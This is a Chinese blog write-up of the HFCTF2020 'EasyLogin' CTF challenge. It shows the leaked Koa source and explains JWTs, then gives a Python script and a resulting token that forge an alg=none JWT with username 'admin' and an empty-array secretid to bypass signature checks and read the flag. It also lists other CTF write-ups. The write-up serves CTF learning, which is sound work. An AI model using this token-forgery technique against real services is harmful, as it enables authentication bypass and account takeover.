[HFCTF2020]EasyLogin

最新推荐文章于 2023-07-15 20:24:04 发布
最新推荐文章于 2023-07-15 20:24:04 发布
阅读量667 收藏
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125819439
版权

[HFCTF2020]EasyLogin

打开之后出现如上登录框,f12可以看到app.js

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置?不管了先填个根目录XD
 */

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}

提示是基于Node.js的koa框架,koa框架下有controllers目录,controllers目录下存有api.js,url直接访问(/controllers/api.js)可得

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};
'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

由上述代码可知,如果名字不是admin的话就无法查看flag

if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

由上述代码可知注册的时候如果用户名为admin的话就无法注册,上述两者相互矛盾,我们可以通过伪造admin身份登录

先注册,再抓包,当抓包的时候会返回一些值

而给的这些值就是jwt,jwt全称Json Web Token,是一种令牌格式,形式由三部分组成,之间由.连接,(解密网站为:JSON Web Tokens - jwt.io)形式大概就是如下:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

三部分分别为1.header:声明了JWT的签名算法 2.payload:承载了各种声明并传递明文数据,例如:username、password等 3.signture:拥有该部分的JWT被称为JWS,也就是签了名的JWS

我们把alg改为none,因为当alg为none的时候,后端将不执行签名验证,也就相当于没有加密方式了,再把username改为admin,secretid改为[],利用脚本生成,脚本:

import jwt
token = jwt.encode(
{
  "secretid": [],
  "username": "admin",
  "password": "123456",
  "iat": 1657953245
},
algorithm="none",key="").encode(encoding='utf-8')

print(token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTY1Nzk1MzI0NX0.

然后按照返回的包来修改正确的内容: 

放包就发现可以登录了,登录后有获得flag的按钮

 继续抓包,发送给repeater,发送即得flag

一夜至秋.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
CTF 湖湘杯 决赛 2021 final.zip
12-07
【CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
第13周做题记录1
08-08
第二个挑战是HFCTF 2021 Final的hatenum。在这个挑战中,源代码被直接提供,我们需要寻找SQL注入的漏洞。登录过程的SQL查询语句在用户输入的用户名和密码未经充分过滤的情况下直接插入,这为SQL注入提供了可能。虽然...
BUUCTF-EasyLogin
最新发布
shawdow_bug的博客
07-15 910
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 3028
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
Abc_Kimball的博客
01-31 685
本题要点:union绕过、命令执行、脚本编写、base64编码 进入页面 使用弱口令破解,一顿弱口令没卵用 抓包查看不用抓包,直接发送到repeater并且go 看见tip有些乱码,拿走解码,base64解密 sql="SELECTusername,passwordFROMadminWHEREusername=′".sql="SELECT username,password FROM admin WHERE username='".sql="SELECTusername,passwordFROMadmin
XCTF:练习CTF解题XMAN比赛 8-8 login
Gunther的博客
09-05 1942
login 首先查看源码(看关键点): 因为是post方式那么我们就利用bp. 在登陆页面输入username=admin,,password=admin得到下面信息: 下面分析: if ($result!=null&&$result->rowCount()==1) { echo $flag; }搜了一下P
[HFCTF2020]EasyLogin(nodejs入门)
qq_44657899的博客
10-13 1961
在做这道题之前,完全不会nodejs。于是这道题也看不懂,于是打算学习学习nodejs。 文章目录app.js代码学习第一部分第二部分第三部分第四部分controllers/api.js部分学习 app.js代码学习 首先是/static/js/app.js的代码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
[BUUCTF]第六天训练日志
Y4tacker的博客
10-04 3902
文章目录[SUCTF 2019]EasyWeb[HFCTF2020]EasyLogin [SUCTF 2019]EasyWeb 做了一半做不动了,换个时间来,花费了很多时间,不过会构造取反绕过了也不错 [HFCTF2020]EasyLogin 一开始以为是seesion伪造,发现我做错了,然后还加了转义字符,不知道怎么做了,看了别人的WP [HFCTF2020]EasyLogin [HFCTF2020]EasyLogin ...
Easy Login...So Easy...(base64编码/修改Cookie/社工)-学习笔记
小龙在线
08-18 880
问题描述 Easy Login…So Easy… 解题思路 打开靶机显示,然后点击登录,发现无权限,然后查看cookie。 看到一个有很特殊名称cookie urldecode之后是:ZGVtb0BkYmFwcHNlY3VyaXR5LmNvbS5jbg== 明显是base64编码后的,反编码之后是:demo@dbappsecurity.com.cn。 这样就知道了cookie的加密方法是:把邮箱base64编码。 继续寻找,查看源码,发现作者是nwup2008。 <meta name="author

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值